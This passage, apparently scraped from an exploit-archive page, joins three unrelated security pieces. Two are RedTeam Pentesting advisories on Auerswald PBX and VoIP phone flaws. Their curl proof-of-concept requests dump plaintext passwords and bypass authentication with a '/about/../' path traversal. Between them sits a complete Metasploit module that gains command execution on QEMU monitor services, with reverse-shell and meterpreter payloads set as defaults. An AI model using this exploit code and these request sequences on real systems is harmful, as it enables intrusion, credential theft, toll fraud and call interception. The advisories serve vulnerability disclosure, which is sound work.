5500R PBX. Afterwards, the list of user accounts can be<br />listed and details shown for each user account. Adding the URL parameter<br />"passwd=1" then also includes the clear text password for each user<br />account, including administrative ones, which can then be used to<br />authenticate against the management interface.<br /><br /><br />Proof of Concept<br />================<br /><br />The command-line HTTP client curl[1] can be used as follows to log in<br />with the username "123" and the password "secret" (shortened and<br />formatted to increase readability):<br /><br />------------------------------------------------------------------------<br />$ curl --anyauth --user 123:secret --include https://192.168.1.2/tree<br /><br />HTTP/1.1 200 OK<br />Content-Type: application/json; charset=utf-8;<br />Set-Cookie: AUERSessionID1234123412=SNKIFTVQBGDRFJB; HttpOnly; Path=/<br />[...]<br /><br />[<br /> {<br /> "login": 1,<br /> "userId": 1234,<br /> "userRufNr": "123",<br /> "userName": "123",<br /> "pbxType": 35,<br /> "pbxId": 0,<br /> "pbx": "COMpact 5500R",<br /> "pbxEdit": "Comp.5500R",<br /> "isActivated": 1,<br /> "dongleTnCount": 112,<br /> "currentConfig": 34,<br /> "cur": "EUR",<br /> "language": 0,<br /> "hidePrivat": 1,<br /> "offlineConfig": false<br /> },<br /> [...]<br />]<br />------------------------------------------------------------------------<br /><br />The server returns a JSON document describing the user account as well<br />as a session ID in a cookie. This session ID can then be used to access<br />other API endpoints on the PBX. The following listing shows the request to<br />the path "/logstatus_state", which returns the current access level:<br /><br />------------------------------------------------------------------------<br />$ curl --cookie 'AUERSessionID1234123412=SNKIFTVQBGDRFJB' --include \<br /> https://192.168.1.2/logstatus_state<br /><br />HTTP/1.1 200 OK<br />Content-Type: application/json; charset=utf-8;<br />[...]<br /><br />{"logstatus":"Teilnehmer"}<br />------------------------------------------------------------------------<br /><br />The access level in this case is "Teilnehmer" (member).<br /><br />The list of all other users can be requested as follows:<br /><br />------------------------------------------------------------------------<br />$ curl --cookie 'AUERSessionID1234123412=SNKIFTVQBGDRFJB' --include \<br /> https://192.168.1.2/cfg_data_teilnehmer<br /><br />HTTP/1.1 200 OK<br />Content-Type: application/json; charset=utf-8;<br />[...]<br /><br />[<br />[...]<br />{"id":1234,"nr":"123","name":"Example User","isSubAdmin":false},<br />[...]<br />{"id":2222,"nr":"555","name":"sub-admin other user","isSubAdmin":true}<br />[...]<br />]<br />------------------------------------------------------------------------<br /><br />Two user accounts are shown in the listing above: the current user's<br />account with the ID 1234 and a different user account with so-called<br />"sub-admin" privileges with the ID 2222.<br /><br />Details about a particular user account with a given ID can be requested<br />like this:<br /><br />------------------------------------------------------------------------<br />$ curl --cookie 'AUERSessionID1234123412=SNKIFTVQBGDRFJB' --include \<br /> 'https://192.168.1.2/teilnehmer_profil_einzel_state?tnId=1234'<br /><br />HTTP/1.1 200 OK<br />Content-Type: application/json; charset=utf-8;<br />[...]<br /><br />{"rufnr":"123","name":"Example User",[...],<br />"privatPin":"XXXXXX","privatPass":"XXXXXXXXXX","privatToken":"XXXXXXXXXX",<br />[...], "isSubadmin":0,[...]}<br />------------------------------------------------------------------------<br /><br />In the returned JSON document, the values of the fields for the PIN,<br />token and password are replaced by "XXX". But if the URL parameter<br />"passwd" is set to the value 1, the values are returned in plain text:<br /><br />------------------------------------------------------------------------<br />$ curl --cookie 'AUERSessionID1234123412=SNKIFTVQBGDRFJB' --include \<br /> 'https://192.168.1.2/teilnehmer_profil_einzel_state?tnId=1234&passwd=1'<br /><br />HTTP/1.1 200 OK<br />Content-Type: application/json; charset=utf-8;<br />[...]<br /><br />{"rufnr":"123","name":"Example User",[...],<br />"privatPin":"12345678","privatPass":"secretpassword",<br />"privatToken":"yyyyyyyyyyyyy",[...], "isSubadmin":0,[...]}<br />------------------------------------------------------------------------<br /><br />This can be repeated for other user accounts, for example for the<br />user account with the ID 2222 shown it the listing earlier. The server<br />returns the plain text password for the other user account:<br /><br />------------------------------------------------------------------------<br />$ curl --cookie 'AUERSessionID1234123412=SNKIFTVQBGDRFJB' --include \<br /> 'https://192.168.1.2/teilnehmer_profil_einzel_state?tnId=2222&passwd=1<br /><br />HTTP/1.1 200 OK<br />Content-Type: application/json; charset=utf-8;<br />[...]<br /><br />{"rufnr":"555","name":"sub-admin other user","privatPin":"99999999",<br />"privatPass":"verysecretpassword","privatToken":"zzzzzzzzzz",<br />[...],"isSubadmin":1,[...]}<br />------------------------------------------------------------------------<br /><br />The password can then be used to log into the PBX with the other user<br />account:<br /><br />------------------------------------------------------------------------<br />$ curl --anyauth --user sub-admin:verysecretpassword --include \<br /> https://192.168.1.2/tree<br /><br />[...]<br />HTTP/1.1 200 OK<br />Content-Type: application/json; charset=utf-8;<br />Set-Cookie: AUERSessionID1234123412=ERQMMDGECSGWTII; HttpOnly; Path=/<br />[...]<br /><br />[{"login":2,"userId":2222,[...]}]<br />------------------------------------------------------------------------<br /><br />Checking the access level with the new session ID shows that the user is<br />now logged in with an administrative account:<br /><br />------------------------------------------------------------------------<br />$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \<br /> https://192.168.1.2/logstatus_state<br /><br />HTTP/1.1 200 OK<br />Content-Type: application/json; charset=utf-8;<br />[...]<br /><br />{"logstatus":"Sub-Administrator"}%<br />------------------------------------------------------------------------<br /><br /><br />Workaround<br />==========<br /><br />Disable or restrict access to the web-based management interface if<br />possible.<br /><br /><br />Fix<br />===<br /><br />Upgrade to a firmware version which corrects this vulnerability.<br /><br /><br />Security Risk<br />=============<br /><br />Attackers who have acquired access to a low-privileged user account, for<br />example by extracting such an account from a VoIP phone, can log into<br />the web-based management interface of the COMpact 5500R PBX and access<br />clear text passwords for other user accounts, including those with the<br />"sub-admin" privilege. After logging in with these newly acquired<br />credentials, attackers can access configuration settings and most other<br />functions.<br /><br />They can then for example create new SIP credentials and use them to<br />call premium rate phone lines they operate to generate revenue. They can<br />monitor and even redirect all incoming and outgoing phone calls and<br />record all Ethernet data traffic.<br /><br />Due to the severe and far-reaching consequences and despite the<br />prerequisite of having to know an existing low-privilege user account,<br />this vulnerability rated as a high risk.<br /><br /><br />Timeline<br />========<br /><br />2021-08-26 Vulnerability identified<br />2021-09-01 Customer approved disclosure to vendor<br />2021-09-10 Vendor notified<br />2021-09-10 CVE ID requested<br />2021-09-10 CVE ID assigned<br />2021-10-05 Vendor provides access to device with fixed firmware<br />2021-10-11 Vendor provides fixed firmware<br />2021-10-15 RedTeam Pentesting examines device, vulnerability seems to be corrected<br />2021-12-06 Advisory published<br /><br /><br />References<br />==========<br /><br />[1] https://curl.se/<br /><br /><br />RedTeam Pentesting GmbH<br />=======================<br /><br />RedTeam Pentesting offers individual penetration tests performed by a<br />team of specialised IT-security experts. Hereby, security weaknesses in<br />company networks or products are uncovered and can be fixed immediately.<br /><br />As there are only few experts in this field, RedTeam Pentesting wants to<br />share its knowledge and enhance the public knowledge with research in<br />security-related areas. The results are made available as public<br />security advisories.<br /><br />More information about RedTeam Pentesting can be found at:<br />https://www.redteam-pentesting.de/<br /><br /><br />Working at RedTeam Pentesting<br />=============================<br /><br />RedTeam Pentesting is looking for penetration testers to join our team<br />in Aachen, Germany. If you are interested please visit:<br />https://www.redteam-pentesting.de/jobs/<br /><br /><br />-- <br />RedTeam Pentesting GmbH Tel.: +49 241 510081-0<br />Dennewartstr. 25-27 Fax : +49 241 510081-99<br />52068 Aachen https://www.redteam-pentesting.de<br />Germany Registergericht: Aachen HRB 14004<br />Geschäftsführer: Patrick Hof, Jens Liebchen<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::Tcp<br /> include Msf::Exploit::CmdStager<br /> include Msf::Exploit::FileDropper<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => "QEMU Monitor HMP 'migrate' Command Execution",<br /> 'Description' => %q{<br /> This module uses QEMU's Monitor Human Monitor Interface (HMP)<br /> TCP server to execute system commands using the `migrate` command.<br /><br /> This module has been tested successfully on QEMU version 6.2.0<br /> on Ubuntu 20.04.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => ['bcoles'],<br /> 'References' => [<br /> ['URL', 'https://wiki.qemu.org/ToDo/HMP'],<br /> ['URL', 'https://www.qemu.org/docs/master/system/monitor.html'],<br /> ['URL', 'https://www.qemu.org/docs/master/system/security.html'],<br /> ['URL', 'https://www.linux-kvm.org/page/Migration'],<br /> ],<br /> 'Arch' => [ ARCH_CMD, ARCH_AARCH64, ARCH_ARMLE, ARCH_X86, ARCH_X64 ],<br /> 'Platform' => %w[unix linux],<br /> 'Payload' => {<br /> 'DisableNops' => true,<br /> 'BadChars' => "\x00\x0a\x0d\x22",<br /> 'Space' => 1010<br /> },<br /> 'Targets' => [<br /> [<br /> 'Unix (Command)',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' },<br /> 'Type' => :unix_cmd<br /> }<br /> ],<br /> [<br /> 'Linux (Dropper)',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ ARCH_AARCH64, ARCH_ARMLE, ARCH_X86, ARCH_X64 ],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp',<br /> 'PrependFork' => true,<br /> 'MeterpreterTryToFork' => true<br /> },<br /> 'Type' => :linux_dropper<br /> }<br /> ]<br /> ],<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> },<br /> 'Privileged' => false,<br /> 'DisclosureDate' => '2011-12-02'<br /> )<br /> )<br /> end<br /><br /> def read_until_prompt<br /> ::Timeout.timeout(10) do<br /> loop do<br /> res = sock.get_once<br /> break if res.nil?<br /> break if res.to_s.include?('(qemu)')<br /> end<br /> end<br /> end<br /><br /> def check<br /> connect<br /> banner = sock.get_once.to_s<br /> disconnect<br /><br /> unless banner.include?('QEMU') && banner.include?('monitor')<br /> return CheckCode::Safe('Service is not QEMU monitor HMP.')<br /> end<br /><br /> CheckCode::Appears('QEMU monitor HMP service is running.')<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> cmd = cmd.gsub('\\', '\\\\\\')<br /> vprint_status("Executing command: #{cmd}")<br /> sock.put("migrate -d \"exec:#{cmd}\"\n")<br /> read_until_prompt<br /> end<br /><br /> def exploit<br /> connect<br /> read_until_prompt<br /><br /> print_status "Sending payload (#{payload.encoded.length} bytes) ..."<br /><br /> case target['Type']<br /> when :unix_cmd<br /> execute_command(payload.encoded)<br /> when :linux_dropper<br /> execute_cmdstager(linemax: 1010, background: true)<br /> end<br /> ensure<br /> disconnect unless sock.nil?<br /> end<br />end<br /></code></pre>
<pre><code>Advisory: Auerswald COMfortel 1400/2600/3600 IP Authentication Bypass<br /><br /><br />RedTeam Pentesting discovered a vulnerability in the web-based<br />configuration management interface of the Auerswald COMfortel 1400 and<br />2600 IP desktop phones. The vulnerability allows accessing configuration<br />data and settings in the web-based management interface without<br />authentication.<br /><br /><br />Details<br />=======<br /><br />Product: Auerswald COMfortel 1400 IP, COMfortel 2600 IP, COMfortel 3600 IP<br />Affected Versions: <= 2.8F<br />Fixed Versions: 2.8G (for COMfortel 1400 IP, COMfortel 2600 IP, COMfortel 3600 IP)<br />Vulnerability Type: Authentication Bypass<br />Security Risk: high<br />Vendor URL: https://www.auerswald.de<br />Vendor Status: fixed version released<br />Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-004<br />Advisory Status: published<br />CVE: CVE-2021-40856<br />CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40856<br /><br /><br />Introduction<br />============<br /><br />"The COMfortel 2600 IP is an Android-based hybrid VoIP telephone (SIP and<br />IP system phone), with 4.3" colour touch display and preconfigured<br />answering machine"<br /><br />(from the vendor's homepage)<br /><br /><br />More Details<br />============<br /><br />During a penetration test it was discovened that several VoIP phones<br />(COMfortel 2600 and 1400 IP) by the manufacturer Auerswald allow<br />accessing administrative functions without login credentials, bypassing<br />the authentication. This can be achieved by simply prefixing API<br />endpoints that require authentication with "/about/../", since the<br />"/about" endpoint does not require any authentication.<br /><br /><br />Proof of Concept<br />================<br /><br />The phones run a web-based management interface on Port 80. If accessed,<br />the HTTP response code 401 together with a website redirecting to the<br />path "/statics/pageChallenge.html" is returned. This can for example be<br />seen using the command-line HTTP client curl[1] as follows:<br /><br />------------------------------------------------------------------------<br />$ curl --include 'http://192.168.1.190/'<br />HTTP/1.1 401 Unauthorized<br />[...]<br /><br /><!DOCTYPE html><html><head><meta http-equiv='refresh' content='0;<br />URL=/statics/pageChallenge.html'></head><body></body></html><br />------------------------------------------------------------------------<br /><br />The website contains JavaScript code that requests the path<br />"/about?action=get" and loads a JSON document (formatted and shortened<br />to increase readability):<br /><br />------------------------------------------------------------------------<br />$ curl --include 'http://192.168.1.190/about?action=get'<br /><br />HTTP/1.1 200 OK<br />Content-Type: application/json; charset=utf-8;<br />Cache-Control: no-cache<br />Content-Length: 3673<br />Date: Mon, 30 Aug 2021 08:39:24 GMT<br />Server: lighttpd<br /><br />{<br /> "DATA": {<br /> "firmware": {<br /> "TYPE": "DATAITEM",<br /> "VALUE": "2.8E",<br /> "KEY": "firmware"<br /> },<br /> "serial": {<br /> "TYPE": "DATAITEM",<br /> "VALUE": "1234567890",<br /> "KEY": "serial"<br /> },<br /> [...]<br /> }<br />}<br /><br />------------------------------------------------------------------------<br /><br />Among other information, this JSON document contains the serial number<br />and firmware version displayed on the website. This action can be<br />accessed without authentication. Other endpoints require authentication,<br />for example the path "/tree?action=get", from which the menu structure<br />is loaded after successful authentication:<br /><br />------------------------------------------------------------------------<br />$ curl --include 'http://192.168.1.190/tree?action=get'<br />HTTP/1.1 401 Unauthorized<br />[...]<br /><br /><!DOCTYPE html><html><head><meta http-equiv='refresh' content='0;<br />URL=/statics/pageChallenge.html'></head><body></body></html><br />------------------------------------------------------------------------<br /><br />During the penetration test, it was discovered that this action can<br />successfully be requested by inserting the prefix "/about/../". In order<br />to prevent curl from normalizing the URL path, the option "--path-as-is"<br />must be supplied:<br /><br />------------------------------------------------------------------------<br />$ curl --include --path-as-is \<br /> 'http://192.168.1.190/about/../tree?action=get'<br /><br />HTTP/1.1 200 OK<br />Content-Type: application/json; charset=utf-8;<br />Cache-Control: no-cache<br />Content-Length: 3808<br />Date: Mon, 30 Aug 2021 08:42:11 GMT<br />Server: lighttpd<br /><br />{<br /> "TYPE": "TREENODEPAGE",<br /> "ITEMS": {<br /> "COUNT": 2,<br /> "TYPE": "ITEMLIST",<br /> "1": {<br /> "id": 31,<br /> "text": "applications_settings",<br /> "TYPE": "TREENODEPAGE",<br /> "ITEMS": {<br /> "COUNT": 1,<br /> "TYPE": "ITEMLIST",<br /> "0": {<br /> "target": "pageFunctionkeys.html",<br /> "id": 32,<br /> "action": "/functionkeys",<br /> "text": "key_app",<br /> "pagename": "Functionkeys",<br /> "TYPE": "TREENODEPAGE"<br /> }<br /> }<br /> },<br /> [...]<br /> }<br />}<br />------------------------------------------------------------------------<br /><br />The endpoint "/account" allows listing account data:<br /><br />------------------------------------------------------------------------<br />$ curl --include --path-as-is \<br /> 'http://192.168.1.190/about/../account?action=list'<br /><br />HTTP/1.1 200 OK<br />Content-Type: application/json; charset=utf-8;<br />Cache-Control: no-cache<br />Content-Length: 793<br />Date: Mon, 30 Aug 2021 08:43:33 GMT<br />Server: lighttpd<br /><br />{<br /> "DATA": {<br /> [...]<br /> "accountList0": {<br /> "KEY": "accountList0",<br /> "COUNT": 1,<br /> "TYPE": "DATAMODEL",<br /> "VALUE": {<br /> "0": {<br /> "ID": 32327,<br /> "PARENTID": 0,<br /> "PROVIDER": "ProviderName",<br /> "NAME": "123 Example User",<br /> "STATUS": 4,<br /> "DEFAULT": 1<br /> }<br /> },<br /> [...]<br /> },<br /> }<br />}<br />------------------------------------------------------------------------<br /><br />The ID 32327 can then be used to get details about that particular<br />account, including the username and password:<br /><br />------------------------------------------------------------------------<br />$ curl --include --path-as-is \<br /> 'http://192.168.1.190/about/../account?action=get&itemID=32327'<br /><br />HTTP/1.1 200 OK<br />Content-Type: application/json; charset=utf-8;<br />Cache-Control: no-cache<br />Content-Length: 2026<br />Date: Mon, 30 Aug 2021 08:44:13 GMT<br />Server: lighttpd<br /><br />{<br /> "DATA": {<br /> [...]<br /> "Benutzer": {<br /> "TYPE": "DATAITEM",<br /> "VALUE": "123",<br /> "KEY": "Benutzer"<br /> },<br /> "Passwort": {<br /> "TYPE": "DATAITEM",<br /> "VALUE": "secret",<br /> "KEY": "Passwort"<br /> },<br /> [...]<br /> }<br />}<br />------------------------------------------------------------------------<br /><br />Using a script for Zed Attack Proxy[2], RedTeam Pentesting managed to<br />access and use the web-based management interface as if regular login<br />credentials were presented.<br /><br />It is likely that other functionality can be accessed in the same way,<br />to for example change settings or activate the integrated option for<br />recording the Ethernet traffic.<br /><br /><br />Workaround<br />==========<br /><br />Disable the web-based management interface if possible.<br /><br /><br />Fix<br />===<br /><br />Upgrade to a firmware version which corrects this vulnerability.<br /><br /><br />Security Risk<br />=============<br /><br />Inserting the prefix "/about/../" allows bypassing the authentication<br />check for the web-based configuration management interface. This enables<br />attackers to gain access to the login credentials used for<br />authentication at the PBX, among other data.<br /><br />Attackers can then authenticate at the PBX as the respective phone and<br />for example call premium rate phone lines they operate to generate<br />revenue. They can also configure a device they control as the PBX in the<br />phone, so all incoming and outgoing phone calls are intercepted and can<br />be recorded. The device also contains a function to record all Ethernet<br />data traffic, which is likely affected as well.<br /><br />Overall, the vulnerability completely bypasses the authentication for<br />the web-based management interface and therefore poses a high risk.<br /><br /><br />References<br />==========<br /><br />[1] https://curl.se<br />[2] https://github.com/zaproxy/zaproxy/<br /><br />Timeline<br />========<br /><br />2021-08-26 Vulnerability identified<br />2021-09-01 Customer approved disclosure to vendor<br />2021-09-10 Vendor notified<br />2021-09-10 CVE ID requested<br />2021-09-10 CVE ID assigned<br />2021-10-04 Vendor provides access to device with fixed firmware<br />2021-10-05 RedTeam Pentesting examines device, vulnerability seems to be corrected<br />2021-10-14 Vendor releases corrected firmware version 2.8G<br />2021-12-06 Advisory published<br /><br /><br />RedTeam Pentesting GmbH<br />=======================<br /><br />RedTeam Pentesting offers individual penetration tests performed by a<br />team of specialised IT-security experts. Hereby, security weaknesses in<br />company networks or products are uncovered and can be fixed immediately.<br /><br />As there are only few experts in this field, RedTeam Pentesting wants to<br />share its knowledge and enhance the public knowledge with research in<br />security-related areas. The results are made available as public<br />security advisories.<br /><br />More information about RedTeam Pentesting can be found at:<br />https://www.redteam-pentesting.de/<br /><br /><br />Working at RedTeam Pentesting<br />=============================<br /><br />RedTeam Pentesting is looking for penetration testers to join our team<br />in Aachen, Germany. If you are interested please visit:<br />https://www.redteam-pentesting.de/jobs/<br /><br /><br />-- <br />RedTeam Pentesting GmbH Tel.: +49 241 510081-0<br />Dennewartstr. 25-27 Fax : +49 241 510081-99<br />52068 Aachen https://www.redteam-pentesting.de<br />Germany Registergericht: Aachen HRB 14004<br />Geschäftsführer: Patrick Hof, Jens Liebchen<br /></code></pre>